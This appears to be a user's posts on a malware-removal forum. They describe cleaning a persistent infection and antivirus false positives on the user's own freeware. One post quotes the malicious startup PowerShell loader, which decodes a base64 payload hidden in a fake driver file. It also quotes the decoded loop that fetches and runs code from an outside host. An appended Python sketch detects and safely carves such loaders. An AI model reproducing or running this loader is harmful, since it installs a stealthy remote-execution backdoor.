Teapot

Honorary Members
  • Posts

    17
Everything posted by Teapot

  1. Well Maurice, you have helped me very much, thanks a lot for your time and your patience. I was considering reinstalling Windows, which would have cost me a lot of time, so I'm very grateful. I wish you all the best too and good luck helping others. Jean
  2. Here you are again. Regarding the false positive, quite a few years back I asked on security software forums about this and I never got responses, except that I learned it's a common problem and I was not alone. Frankly, one has to come to the conclusion that big companies don't care much for small developers. In my case there is a freeware program called planetdance which is rather popular around the world, but I keep getting complaints from people that their anti-virus is refusing and telling them all kinds of scary things, so they don't trust my software. I even got people right-out asking me if I can be trusted :) I stopped complaining about it and accepted it as a fact of life, but if you see a chance to do something, please do. Jean AdwCleaner[C00].txt
  3. It won't let me change the Windows Security Option because it's a trial, it says premium only. I'm not sure whether that means I can't turn it off, it seems to be on. In the scan lots of programs I made are flagged as malware. In fact, lots of security programs flag software as malware for the only reason that they are unknown to them. This is false information. Anyway, things like astroclock.exe, rename.exe, movie.exe etc. etc. are my own. Some are freeware from jcremers.com. I do have Malwarebytes firewall which I love. mb.txt
  4. Hi Maurice, I have a lot of software on the PC which I hardly use, I just keep it because I have the space. For instance I have more than one version of LibreOffice, a whole drive with all kinds of software. Since work on Android has stopped I don't use Java anymore. I know it's a bit of a mess, I'm cleaning things up as I have time. I'm sorry, I thought we were ready and I deleted the c:\FRST map. I only have the .txt file but that's not what you're asking. I have not seen any suspicious activity anymore. Can I make you a small donation? I regret not being able to send the quarantine data you request, I wasn't patient enough, I do see the importance of your work.
  5. I can't get it to download, Chrome and Edge say 'virus detected' and Vivaldi just doesn't download it. Tried a few times.
  6. Here you are.. Addition.txt FRST.txt
  7. Here's the scan result. I think FRST already removed the trojan? Thanks!! result.txt
  8. I'm doing a full scan and it's gonna take some more hours. It will probably be ready tomorrow.
  9. The G: drive is where most of my software projects are.
  10. Hi Maurice, yes I did those, thanks.
  11. Internet problem solved, DHCP was not enabled anymore.
  12. The scan completed in 15 minutes, I attached the log. However I'm having problems with internet now. I had to get to my laptop to post back. Some sites do work, but others are unreachable. Fixlog.txt
  13. My topic was hijacked so I complained and the webmaster has made a new topic for me. Thanks! I will await your instructions. I don't think there's anything active anymore, I don't see strange processes, but I would like an opinion from the expert.
  14. Hello, I had a PowerShell script running at startup. I've done some research, deleted some files, and I don't see the process anymore but I still don't know what it was. This was the command line for the script:

      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\SkVSjq0D9\DA4A1F43-F9E8-4A62-988D-3DDAC0ECE249.sys'), 1560279, 410); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))}

      With a little help I could decipher what the script tried to do:

      while ($true) {try {$r = Invoke-RestMethod -Uri 'http://wmail-service.com/v1/CECCE2DA-EF51-4D10-B16A-726EEBC7E043?v=Downloads_Counter12'if($r -ne ''){Start-Job ([ScriptBlock]::Create($r)) | Wait-Job}}catch {}Start-Sleep 2}

      I deleted that folder in System32\drivers and I have not seen PowerShell running anymore but I'm not reassured. Still don't know what started that script. Thanks a bunch for help. PS: I'm a developer so there are some unknown exe's on my system, sorry. FRST.txt Addition.txt
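
A defender-side triage sketch for the kind of command line quoted in post 14, added here as an example and not code from the poster or the forum helper. It flags PowerShell command lines that read a slice of a file, base64-decode it and execute it, and it extracts the path, offset and length so the staged text can be decoded from a copy without running it. The trait names, function names and sample strings (including the EXAMPLE path) are constructed for this example.

```python
import base64
import re

# Traits of the loader command line quoted in the post; the names are this example's own.
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "appv_proxy": re.compile(r"Sync-AppvPublishingServer", re.I),
    "reads_binary_file": re.compile(r"ReadAllBytes\(", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "dynamic_exec": re.compile(r"\[Scriptblock\]::Create|Invoke-Expression|\biex\b", re.I),
}

# GetString(ReadAllBytes('<path>'), <offset>, <count>) tells where the staged script lives.
STAGE = re.compile(r"ReadAllBytes\('([^']+)'\)\s*,\s*(\d+)\s*,\s*(\d+)", re.I)


def triage(cmdline):
    """Return matched trait names plus the (path, offset, length) of any staged payload."""
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(cmdline))
    m = STAGE.search(cmdline)
    stage = (m.group(1), int(m.group(2)), int(m.group(3))) if m else None
    return hits, stage


def is_suspicious(cmdline):
    """Flag when a file slice is base64-decoded and executed, the core of this loader."""
    hits, _ = triage(cmdline)
    return {"reads_binary_file", "base64_decode", "dynamic_exec"} <= set(hits)


def carve(blob, offset, length):
    """Decode the staged text from a copy of the carrier file without running it."""
    return base64.b64decode(blob[offset:offset + length]).decode("utf-8", "replace")


# Constructed samples: a shortened loader shaped like the one in the post, and a benign task.
LOADER = (r'powershell.exe -NonInteractive -WindowStyle Hidden -Command &{import-module AppvClient; '
          r"Sync-AppvPublishingServer n; $sc = [System.Text.Encoding]::UTF8.GetString("
          r"[System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\EXAMPLE\carrier.sys'), 16, 28); "
          r"$sc2 = [Convert]::FromBase64String($sc); Invoke-Command ([Scriptblock]::Create("
          r"[System.Text.Encoding]::UTF8.GetString($sc2)))}")
BENIGN = r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"
# Constructed carrier: 16 filler bytes, then 28 base64 characters, then more filler.
CARRIER = b"\x00" * 16 + base64.b64encode(b"Write-Output 'staged'") + b"\xff" * 8

if __name__ == "__main__":
    for line in (LOADER, BENIGN):
        print(is_suspicious(line), triage(line))
    print(carve(CARRIER, 16, 28))
```

Run `triage` over process-creation or scheduled-task command lines, and run `carve` only on a copy of the carrier file taken for analysis.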